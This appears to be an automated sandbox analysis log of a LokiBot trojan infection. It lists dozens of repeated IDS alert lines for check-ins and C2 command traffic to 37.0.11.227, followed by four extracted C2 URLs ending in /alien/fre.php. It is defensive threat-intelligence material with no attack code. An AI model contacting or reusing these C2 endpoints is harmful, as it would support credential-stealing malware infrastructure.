              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49775 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49775
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49777 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49777 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49777 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49777 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49777 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49777
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49780 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49780 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49780 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49780
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49781 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49781
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49782 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49782
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49785 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49785
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49786 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49786
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49789 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49789
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49794 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49794
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49795 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49795
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49800 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49800
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49805 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49805
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49806 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49806
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49807 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49807
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49809 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49809
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49810 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49810
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49812 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49812
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49813 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49813 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49813 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49813 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49813 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49813
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49814 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49814
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49815 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49815
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49817 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49817
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49818 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49818
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49820 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49820
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49822 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49822 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49822 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49822 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49822 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49822
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49823 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49823 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49823 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49823 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49823 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49823
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49824 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49824 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49824 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49824 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49824 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49824
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49826 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49826
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49829 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49829 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49829 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49829 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49829 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49829
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49836 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49836 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49836 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49836 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49836 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49836
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49843 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49843 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49843 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49843 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49843 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49843
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49852 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49852 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49852 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49852 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49852 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49852
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49860 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49860 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49860 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49860 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49860 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49860
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49870 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49870
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49878 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49878 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49878 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49878 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49878 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49878
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49884 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49884 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49884 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49884 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49884 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49884
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49888 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49888 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49888 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49888 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49888 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49888
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49889 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49889 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49889 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49889 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49889 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49889
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
